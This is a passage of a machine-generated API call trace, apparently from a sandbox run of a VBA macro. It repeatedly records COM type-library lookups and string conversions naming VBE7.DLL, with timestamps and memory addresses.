cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3e20, pBstrName=0x0, pwOrdinal=0x33e4fb3e40 | out: pBstrDllName=0x33e4fb3e20*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3e40*=0x40b0) returned 0x0 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3e20, pwOrdinal=0x500000000) returned 0x0 [0060.582] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3f00, pIndex=0x0 | out: ppTLib=0x33e4fb3f00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.582] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3f10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3f10, pDummy=0x0) returned 0x0 [0060.582] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.582] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3f00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3f00, pBstrName=0x0, pwOrdinal=0x33e4fb3f20 | out: pBstrDllName=0x33e4fb3f00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb3f20*=0x4190) returned 0x0 [0060.582] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3f00, pwOrdinal=0x500000000) returned 0x0 [0060.582] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb3fe0, pIndex=0x0 | out: ppTLib=0x33e4fb3fe0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.582] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb3ff0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb3ff0, pDummy=0x0) returned 0x0 [0060.583] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.583] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb3fe0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb3fe0, pBstrName=0x0, pwOrdinal=0x33e4fb4000 | out: pBstrDllName=0x33e4fb3fe0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4000*=0x4270) returned 0x0 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb3fe0, pwOrdinal=0x500000000) returned 0x0 [0060.583] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb40c0, pIndex=0x0 | out: ppTLib=0x33e4fb40c0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.583] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb40d0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb40d0, pDummy=0x0) returned 0x0 [0060.583] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.583] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb40c0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb40c0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0 | out: pBstrDllName=0x33e4fb40c0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb40e0*=0x4350) returned 0x0 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb40c0, pwOrdinal=0x500000000) returned 0x0 [0060.583] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb41a0, pIndex=0x0 | out: ppTLib=0x33e4fb41a0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.583] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb41b0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb41b0, pDummy=0x0) returned 0x0 [0060.583] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.583] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb41a0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb41a0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0 | out: pBstrDllName=0x33e4fb41a0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb41c0*=0x4430) returned 0x0 [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb41a0, pwOrdinal=0x500000000) returned 0x0 [0060.583] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4280, pIndex=0x0 | out: ppTLib=0x33e4fb4280*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.583] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4290, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4290, pDummy=0x0) returned 0x0 [0060.583] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.583] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.583] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4280, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4280, pBstrName=0x0, pwOrdinal=0x33e4fb42a0 | out: pBstrDllName=0x33e4fb4280*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42a0*=0x4510) returned 0x0 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4280, pwOrdinal=0x500000000) returned 0x0 [0060.584] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4360, pIndex=0x0 | out: ppTLib=0x33e4fb4360*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.584] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4370, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4370, pDummy=0x0) returned 0x0 [0060.584] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.584] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4360, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4360, pBstrName=0x0, pwOrdinal=0x33e4fb4380 | out: pBstrDllName=0x33e4fb4360*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4380*=0x45f0) returned 0x0 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4360, pwOrdinal=0x500000000) returned 0x0 [0060.584] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4440, pIndex=0x0 | out: ppTLib=0x33e4fb4440*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.584] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4450, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4450, pDummy=0x0) returned 0x0 [0060.584] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.584] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4440, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4440, pBstrName=0x0, pwOrdinal=0x33e4fb4460 | out: pBstrDllName=0x33e4fb4440*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4460*=0x46d0) returned 0x0 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4440, pwOrdinal=0x500000000) returned 0x0 [0060.584] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb4520, pIndex=0x0 | out: ppTLib=0x33e4fb4520*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.584] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb4530, pDummy=0x0 | out: ppTLibAttr=0x33e4fb4530, pDummy=0x0) returned 0x0 [0060.584] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.584] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb4520, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb4520, pBstrName=0x0, pwOrdinal=0x33e4fb4540 | out: pBstrDllName=0x33e4fb4520*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb4540*=0x47b0) returned 0x0 [0060.584] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb4520, pwOrdinal=0x500000000) returned 0x0 [0060.584] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2a00, pIndex=0x0 | out: ppTLib=0x33e4fb2a00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.585] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2a10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2a10, pDummy=0x0) returned 0x0 [0060.585] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.585] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2a00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2a00, pBstrName=0x0, pwOrdinal=0x33e4fb2a20 | out: pBstrDllName=0x33e4fb2a00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2a20*=0x2c90) returned 0x0 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2a00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2a00, pwOrdinal=0x500000000) returned 0x0 [0060.585] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2a00, pIndex=0x0 | out: ppTLib=0x33e4fb2a00*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.585] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2a10, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2a10, pDummy=0x0) returned 0x0 [0060.585] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.585] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2a00, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2a00, pBstrName=0x0, pwOrdinal=0x33e4fb2a20 | out: pBstrDllName=0x33e4fb2a00*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2a20*=0x2c90) returned 0x0 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2a00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2a00, pwOrdinal=0x500000000) returned 0x0 [0060.585] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2ae0, pIndex=0x0 | out: ppTLib=0x33e4fb2ae0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.585] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2af0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2af0, pDummy=0x0) returned 0x0 [0060.585] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.585] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2ae0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2ae0, pBstrName=0x0, pwOrdinal=0x33e4fb2b00 | out: pBstrDllName=0x33e4fb2ae0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2b00*=0x2d70) returned 0x0 [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2ae0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2ae0, pwOrdinal=0x500000000) returned 0x0 [0060.585] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2bc0, pIndex=0x0 | out: ppTLib=0x33e4fb2bc0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.585] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2bd0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2bd0, pDummy=0x0) returned 0x0 [0060.585] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.585] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.585] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2bc0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2bc0, pBstrName=0x0, pwOrdinal=0x33e4fb2be0 | out: pBstrDllName=0x33e4fb2bc0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2be0*=0x2e50) returned 0x0 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2bc0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2bc0, pwOrdinal=0x500000000) returned 0x0 [0060.586] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2ca0, pIndex=0x0 | out: ppTLib=0x33e4fb2ca0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.586] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2cb0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2cb0, pDummy=0x0) returned 0x0 [0060.586] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.586] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2ca0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2ca0, pBstrName=0x0, pwOrdinal=0x33e4fb2cc0 | out: pBstrDllName=0x33e4fb2ca0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2cc0*=0x2f30) returned 0x0 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2ca0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2ca0, pwOrdinal=0x500000000) returned 0x0 [0060.586] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2d80, pIndex=0x0 | out: ppTLib=0x33e4fb2d80*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.586] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2d90, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2d90, pDummy=0x0) returned 0x0 [0060.586] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.586] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2d80, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb2d80, pBstrName=0x0, pwOrdinal=0x33e4fb2da0 | out: pBstrDllName=0x33e4fb2d80*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb2da0*=0x3010) returned 0x0 [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb2d80, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb2d80, pwOrdinal=0x500000000) returned 0x0 [0060.586] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb2e60, pIndex=0x0 | out: ppTLib=0x33e4fb2e60*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.586] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb2e70, pDummy=0x0 | out: ppTLibAttr=0x33e4fb2e70, pDummy=0x0) returned 0x0 [0060.586] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.586] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.586] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb2e60, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.586] WideCharToMultiByte (in: 